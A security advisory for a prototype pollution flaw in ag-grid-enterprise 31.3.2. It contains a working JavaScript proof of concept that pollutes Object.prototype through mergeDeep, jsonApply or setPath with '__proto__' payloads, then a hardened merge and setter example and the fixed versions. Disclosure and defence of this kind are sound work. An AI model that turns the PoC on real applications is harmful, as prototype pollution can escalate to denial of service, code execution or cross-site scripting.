Vulnerability type: Prototype Pollution
CVSS Score: 9.8 CRITICAL
Vendor of the Package: ag-grid
Affected Package:
- Product: ag-grid-enterprise
- Version: 31.3.2
Affected component(s):
_.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath, _Util.jsonApply
Attack vector(s):
An attacker can modify the built-in Object.prototype by calling one of the vulnerable functions (_.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath or _Util.jsonApply) with an argument containing the special property __proto__. The polluted prototype alters application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.
Description:
Affected versions of this package are vulnerable to Prototype Pollution through the functions _.mergeDeep, _ModuleSupport.jsonApply, _ModuleSupport.setPath and _Util.jsonApply. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to a vulnerable function crafted with the built-in property __proto__. The attack can potentially be escalated to denial of service, remote code execution or cross-site scripting, depending on the gadgets reachable by the attack.
Proof-of-Concept:
(async () => {
  const lib = await import('ag-grid-enterprise');
  // An unrelated object that never touches the library: any change visible
  // through its prototype shows that Object.prototype itself was modified.
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // Enable one method at a time.
    lib._.mergeDeep({}, JSON.parse('{"__proto__":{"test":123}}'));
    //lib._ModuleSupport.jsonApply({}, JSON.parse('{"__proto__":{"test":123}}'));
    //lib._ModuleSupport.setPath({}, "__proto__.test", 123);
    //lib._Util.jsonApply({}, JSON.parse('{"__proto__":{"test":123}}'));
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Remove the polluted property so the check does not affect other code.
  delete Object.prototype.test;
})();
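For comparison, the following is an added example (not ag-grid's own code) of how a deep merge and a dotted-path setter can refuse prototype-bearing keys, exercised with the same payloads the PoC above uses; safeMergeDeep, safeSetPath and prototypeIsClean are hypothetical names.

```javascript
// Added example, not ag-grid's code: a deep merge and a dotted-path setter that
// refuse prototype-bearing keys, exercised with the payloads from the PoC above.
// safeMergeDeep, safeSetPath and prototypeIsClean are hypothetical names.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Recurse only into plain objects; arrays and class instances are assigned as-is.
function isPlainObject(v) {
  if (v === null || typeof v !== 'object') return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Hardened mergeDeep: walks own enumerable keys only (a JSON-parsed "__proto__"
// is an own key, so it is caught here) and rejects forbidden names outright.
function safeMergeDeep(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`refusing to merge key "${key}"`);
    const value = source[key];
    if (isPlainObject(value)) {
      // Never reuse a child reached through the prototype chain; create an own one.
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMergeDeep(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened setPath: "a.b.c" creates intermediate own objects; no segment may be forbidden.
function safeSetPath(target, path, value) {
  const segments = path.split('.');
  for (const seg of segments) {
    if (FORBIDDEN_KEYS.has(seg)) throw new Error(`refusing to set path segment "${seg}"`);
  }
  let node = target;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    if (!hasOwn(node, seg) || !isPlainObject(node[seg])) node[seg] = {};
    node = node[seg];
  }
  node[segments[segments.length - 1]] = value;
  return target;
}

// Defender's check: a fresh, empty object sees `prop` only if Object.prototype was polluted.
function prototypeIsClean(prop) {
  return !(prop in {});
}
```

Both payloads from the PoC are rejected with an exception before any property is written, so prototypeIsClean('test') stays true; ordinary nested merges and paths still work.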
Please note this has been addressed and resolved in:
- AG Grid 31.3.4 (for version 31) and 32.0.2 (for version 32)
- AG Charts 9.3.2 (for version 9) and 10.0.2 (for version 10)